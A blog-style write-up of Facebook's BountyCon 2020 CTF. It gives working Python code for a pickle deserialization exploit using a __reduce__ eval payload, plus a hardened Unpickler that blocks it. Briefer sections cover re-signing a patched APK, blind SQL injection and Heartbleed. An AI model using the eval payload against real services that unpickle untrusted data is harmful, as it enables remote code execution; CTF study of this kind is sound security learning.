Facebook's BountyCon 2020 CTF Writeup

BountyCon2020

BountyCon is an invitation-only application security conference organized annually by Facebook in Singapore for the bug bounty community of the Asia-Pacific region.

For more information about it, check here.

BountyCon2020 is the second edition. I was lucky enough to win a fully sponsored invitation from Facebook to attend the last edition, and it was an amazing experience filled with lots of hacking, knowledge sharing, travelling around Singapore, networking, and hacking discussions over food and drinks with fellow bug bounty hunters and talented hackers from all over the world. It can't get better than that for a hacker.

Shoutout to the hackers who made that trip a memorable one: Prateek Tiwari, Bhavuk Jain, Rahul Maini, Pranav Hivarekar, Anand Prakash and everyone else from the Indian Bug Hunters community.

To get an invite, one has to top the leaderboard of the BountyCon CTF.

CTF Writeup

Following is a writeup of a challenge that I really enjoyed solving and learned some new things from in the process.

1. Tick-Tock

This was a white-box challenge around a Python library. The code of an AWS Lambda function was given, and it was vulnerable to arbitrary unpickling of Python objects through the pickle serialization library.

import base64
import pickle
import time

class Epoch(object):
    def __init__(self, timestamp):
        self.ts = timestamp

# The current epoch time is wrapped in an Epoch object, pickled and base64-encoded into the cookie
epoch = Epoch('{:d}'.format(int(time.time())))
cookie = base64.b64encode(pickle.dumps(epoch))

The usual arbitrary code execution route through the pickle library was shut down by the Lambda's FunctionShield policy, which blocks all read/write, outbound connectivity and child process creation attempts.

import function_shield

function_shield.configure({
    "policy": {
        "outbound_connectivity": "block",
        "read_write_tmp": "block",
        "create_child_process": "block",
        "read_handler": "block"
    }
})

The flag for the challenge was in a globally initialized variable.

Pseudo-code of the execution flow was as follows:

If cookie is not set:
    - Initialize an object of the Epoch class with the timestamp.
    - Pickle this object and set it as a cookie.
    - Send the response with an empty body.
Else:
    - Unpickle the cookie value.
    - Get the timestamp value from the cookie.
    - Send a page with HTML which shows a timer using this timestamp variable.

So in a nutshell, whatever gets assigned to the timestamp attribute of the Epoch class gets reflected into the HTML source. That was the trick to solving the challenge: we somehow had to make the code initialize the reflected value with the flag variable, and unpickling was our way to do it.

To arrive at the following solution, I went through the official pickle documentation.

import base64
import pickle

class Epoch(object):
    def __init__(self, timestamp):
        self.ts = timestamp

    def __reduce__(self):
        # On unpickling, the loader calls eval('Epoch(flag)') and uses its result as the object
        return (eval, ('Epoch(flag)',))

def lambda_handler(event, con):
    epoch = Epoch("31337")
    # decode() so the cookie is a str and can be serialized into the response
    cookie = base64.b64encode(pickle.dumps(epoch)).decode()

    return {
        'statusCode': 200,
        'Exploit-Cookie': cookie
    }

To manipulate it, we have the __reduce__ method, which governs how the object is reconstructed upon unpickling. The above code returns a tuple whose first element is the callable and whose second element is the tuple of arguments for it. The result of unpickling the pickled byte stream of the above class's instance is that eval('Epoch(flag)') gets executed and the result of eval is returned directly as the unpickled object.

In this case, that will be an instance of the Epoch class initialized with the flag variable, and the attribute containing the flag string will get reflected into the HTML by the following code.

epoch = pickle.loads(base64.b64decode(
    event['multiValueHeaders']['cookie'][0]))
return {
    'body': clock_page(epoch.ts)
}

So with our exploit, it effectively means:

epoch = Epoch(flag)

In this way, we successfully get the value of the flag variable into the ts attribute of the unpickled object.
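As an added example (not the challenge's code), here is the whole round trip with a constructed flag: the attacker-side __reduce__, the challenge's unsafe pickle.loads, and a restricted Unpickler that would have refused the cookie. flag, EvilEpoch, make_cookie, load_cookie_unsafe, load_cookie_safe and EpochOnlyUnpickler are assumed names; eval resolves Epoch and flag in this module's globals just as it resolved them in the Lambda handler's.

```python
import base64
import io
import pickle

# Constructed stand-in for the challenge's globally initialised flag.
flag = "FLAG{constructed_example_value}"

class Epoch(object):
    def __init__(self, timestamp):
        self.ts = timestamp

class EvilEpoch(Epoch):
    # Attacker-side copy of Epoch: when unpickled, the loader calls
    # eval('Epoch(flag)') in the caller's globals and returns the result.
    def __reduce__(self):
        return (eval, ("Epoch(flag)",))

def make_cookie(obj):
    return base64.b64encode(pickle.dumps(obj)).decode()

def load_cookie_unsafe(cookie):
    # What the challenge did: pickle.loads() on attacker-controlled bytes.
    # eval() gets no explicit globals, so Epoch and flag come from this module.
    return pickle.loads(base64.b64decode(cookie))

class EpochOnlyUnpickler(pickle.Unpickler):
    # Hardened loader: the only global a cookie may name is this module's Epoch.
    # builtins.eval (or any other global) raises before anything is called.
    def find_class(self, module, name):
        if module == __name__ and name == "Epoch":
            return Epoch
        raise pickle.UnpicklingError("forbidden global %s.%s" % (module, name))

def load_cookie_safe(cookie):
    return EpochOnlyUnpickler(io.BytesIO(base64.b64decode(cookie))).load()

def safe_loader_rejects(cookie):
    # True if the hardened loader refuses the cookie instead of executing it.
    try:
        load_cookie_safe(cookie)
    except pickle.UnpicklingError:
        return True
    return False
```

A legitimate Epoch cookie loads through both loaders; the EvilEpoch cookie yields Epoch(flag) from the unsafe loader and an UnpicklingError from the restricted one.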



The remaining challenges were less exciting compared to Tick-Tock:

2. Lighthouse

The challenge had an Android app. Upon reversing and analyzing the APK, it was clear that the app takes the flag string from native code, converts it to a Morse code string and uses it to blink the phone's flashlight.
I had multiple ideas to solve it, but I solved it using a C++ tool that converts a video to Morse code. I was not sure it was good enough to detect the Morse code from a video of the phone's flash, but I gave it a try anyway. The code was outdated and would not compile, so I made some tweaks to the C++ code to get it building. I recorded a video of the phone flashing and fed it to the compiled binary. It worked like a charm.

3. Shake it

This one also consisted of an Android app. As its name suggests, it counted down 10 million shakes of the phone, and upon completion of that many shakes it would reveal the flag string stored in native code.
I decompiled the APK using apktool:

$ apktool d shake-it.apk

Then I updated the smali code that initializes this counter from 10 million to 10:

0xF4240 -> 0xA in MainActivity.smali

# In MainActivity.smali
.field private static final TARGET:I = 0xF4240

to

.field private static final TARGET:I = 0xA

Rebuilt the APK:

$ apktool b shake-it -o shake-it-modified.apk

Self-signed it:

$ keytool -genkey -v -keystore key.keystore -alias self -keyalg RSA -keysize 2048 -validity 10000

$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore shake-it-modified.apk self

Installed the APK, shook the phone ten times and got the flag!

4. Who’s Sequel

This challenge had a login form. Upon fuzzing it, it was clear that it was vulnerable to blind SQL injection. Dumping the tables using sqlmap revealed the flag in the last row of one of the tables.

5. Heart of Stone

The challenge name and the Server header in the response gave away the hint of Heartbleed (CVE-2014-0160). I exploited it and read the memory containing the flag.


Due to work and other commitments, I don't get much time to participate in CTFs for fun. But I recently formed a CTF team, UnderDawgs, with Rudra and Arbaz, and we are actively looking for people experienced in pwn, crypto and reversing CTF challenges. If you think you can contribute to the team, please reach out.

Thanks for reading.

Hack the Planet,
CaptainFreak